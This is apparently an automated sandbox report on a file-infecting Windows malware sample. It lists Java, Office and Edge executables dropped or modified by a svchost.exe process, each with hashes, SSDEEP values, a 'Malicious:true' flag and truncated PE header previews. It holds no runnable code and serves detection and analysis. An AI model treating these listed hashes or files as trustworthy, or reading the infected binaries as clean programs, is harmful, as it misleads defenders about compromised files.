                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032874161470648
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:LZmHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E99217CA423C6C0EC194C9C373427E2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4AD074C8F6E82315CAE842B3F4EA566CA974319E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D7A4428957479FB2B28AAFCA298AD6CC1F47CE1C1FD25C477B90A5FEF0D34621
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89706D24B594FD9346A5BF8643EEB57AFDB06DA6A15491872251C8F1B404FB1776C64A5F5DFFAAD2E2EF8C3F9D50E558979B234A046ACEC76D5878F251670FBB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032910563203062
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:BeS/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:51EDB9EAE487255B983AA1A0925F1248
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:31F6F272BBD6D66D17A114A97715354B680E41D5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:34C2B81440069DDEE6B41540DB002FEBCBEBC71FE010CFB28173478224CA893B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68E8847E0A366DDDCF776DFC01D5D6B77F93797248D65749290BBCBD477180678838A882276AA3EB835686C83F57B0E1B21BDF78ED5C7F9A0A5E8829B39DF190
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................C........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032986669033775
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:s5/3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FAB47ADA02617456F8CE73B4688D779D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5B012C0DE5C65A959A3F180093317F7BEDC24B3D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9412267FCE87452D74A33D9B966A6A3C2E7245C964D4D5DE8AD8AB1ADFEC2909
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:87D92188FB35A1FD26105D499F12298C77E093409D000070D4DB25775F5377E26337AB4EC82A7828703ED5E2F66FDD9C17F4D65E919D3597387C590E81192DE8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................y........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1202688
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098050849771256
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:N7lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:N7lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4F0AD509217BC13D5D7E3BDE3C3D7B1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4510B1F0A9BB78D33D552431EDB635A2330D6D7D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:514AB97D393E5C50EBF8888BC1C68CB767D808F06C05AB1444D6F04A689DDACA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7E6F61D4EF8DA2699950CD105086112E844BED966725E741C73B2383B0AF9E0270746A29828051A98480D508186CD06B2F20D13DE0A1D8B329C3B80D5FDE151E
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................U@..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032321590121066
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:qKQDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04528FA8B5C1C9C87428AE68CA7F02ED
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F255739CF00115289A203F2A4CDA6EC833299CCE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:51D3E69BAA5CE427CB327FACBC4DDD2D73C83D51D16EEA6B3B0B343AD6F1F0BA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BAE020EC2665625E809C3D7C9EF8F4ED1BA62622EA03C729E99C566756B25D3E8B4233DB2CCAD95359CD4AA3FE6AE7C16D7C5AA440317B804E5B085FCAF3A4B5
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.249088686996736
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Xi7l/3roAZsqjnhMgeiCl7G0nehbGZpbD:ql/roAdDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1406D63ABA537A34EB3EDB07FDB1A453
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FFFAC835D6DF838181A41C6588223FAFEC84AB8B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:29EDEBECF245ED6421D4BFFE114EB9C3BA0594ECC8C4B232C7328BE5DD550F49
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1656BFD5E3C83447854863B34A0850191C316C11786D7F0018CAF0F36101565973234842097C4AA8C0D95231BDFD4BA6A736236EA4AD4FEFD08B9CAE640D9E13
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.......>..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.286873750311924
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:y5bfQn9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yNfQn9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:23BE72451E170676582586B8B7D99448
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D572F7FD3B49C479FE2924F307D2FD31C995B1B6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B6D65CFE2D1A710F1948458A0517D893148963F0E3BBBA5A1E271F3F7F6F8D09
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7F102AB2E63D63EF94829F79A57B130DB667A49868B0883F3BEBBEF348E096BD8A7E89E4E002F69F2514F4FFB8FCFA61F39DFF15E652D42778A72772454CD965
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.303342275535263
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:JNmt0LDILi21SXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:MLihsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CDAE14C1CABBADE64EAD9474961997E1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:03134972AB85FE47B35B8C9EED832AF7BC8A499C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6181359B059B181CE593D431048CCC664C0C63F0900BC44B7CED16CE5FF8E70B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BCF602BA6897CE9C05DA8E179FF76466A372BE859AE2A0FDBDB4AE05FE97A103E343638EAFE3125BB53C60A42DFABF9BEC10FB683E96224D086D35F7A6E54D34
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................\............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.303348207625624
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:PNmt0LDILi21SXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:SLihsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4E912E775B6B9AE8252F11E64A561889
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EAB1C6B087AD4D62078B5EF3FD17FC9E347A7CE1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:54D5B25AB8F8A7732A04D2BB0078B07848CE1B3F1451DD0E415F8303DAE3F3D7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3323DD3CE3BEBA388DE42880FFCA406CE5CF7D52B61A1C9F983CEFE1F47C6F438A2880F6B314ECD825F477F991FEA3C630C487FB0E0D4978FC57481534F29534
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................<........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.236043068589741
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:cjuozQMGNUbTlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:IfhsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:31D16D7F88D26BD3CDFCE0C8964DA84A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:81AFD7FDBFFB335A6A8D09803DB0CD1AEB30ADAD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:408849D19F984F79C0C943CFDFA5C9364244AD4787C993F882F1CF047AC471E3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:39BE4CDBC0B16084EAC46FCECE87F64AF9751B25A458D64BC092D2A2F4957510DA9997FA87C16F8BAE48DBC5C02677ED9040D2951F9AA8841AAC6314CD951A3B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1496064
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5779390149781225
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:2bUO42i/EMsqjnhMgeiCl7G0nehbGZpbD:2J4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1F688D47BC07F1626735D52E2304EBCE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:456B8401F7F63F39987E9F4CB430B2A7E05B369F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2857126C9EDBD1C31B9BD89DA2EFE0DFD5EF585628063E6BA1258636D85CAD31
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A7BD5F23F79E02EE2A4C1BEA8B749BEC1997C2B27CCCC859FB90DEBC5B63EFA2593D384E4501B8B98F7EE73E77EE344A2D0B795F06BDD0D31B9845BBAE22FDA8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... .......5........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.961838772502763
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:oLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:0icZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CCAAD49D6B212767EF909B80B8D93F54
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F02E4401451DD412A74E7325995D936C2989DBC9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0C5B77AF2B2593BDA24B6385C98A49E13B0139E7148C1026D98021282909424B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5537C769F18C77514110F8794A49EEA5124300D465ACA298ADE6350BB4CDE2570C756746AAFBFCD09A5A9BA7B7C2C5C9A655FAB63A2F320B6D34DF3AC0B4015E
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......q$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.635119286683742
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:IE8DMeflpnIOvYUtsqjnhMgeiCl7G0nehbGZpbD:ItDD9pnIO/Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:78A61A5313B4BC79396A0DE9DA3656EE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:350ED3A398B503EE1DD9D086B3285AF6893B5FD3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BB3682FF534384EF950163328043FE8BE0088929C0DDDB2E49ED2669A668568B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:93A9FA52687F961C79ED697AA09DAD85B754C28DD28E2378DBE9D7606693D66D315ED1CD969467075362582BCE5623C1CA4349DAF64264546DA6A25911ADDE28
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.748469662312179
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:WB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EYDmg27RnWGj:AHzorVmr2ZkRpdJYolaD527BWG
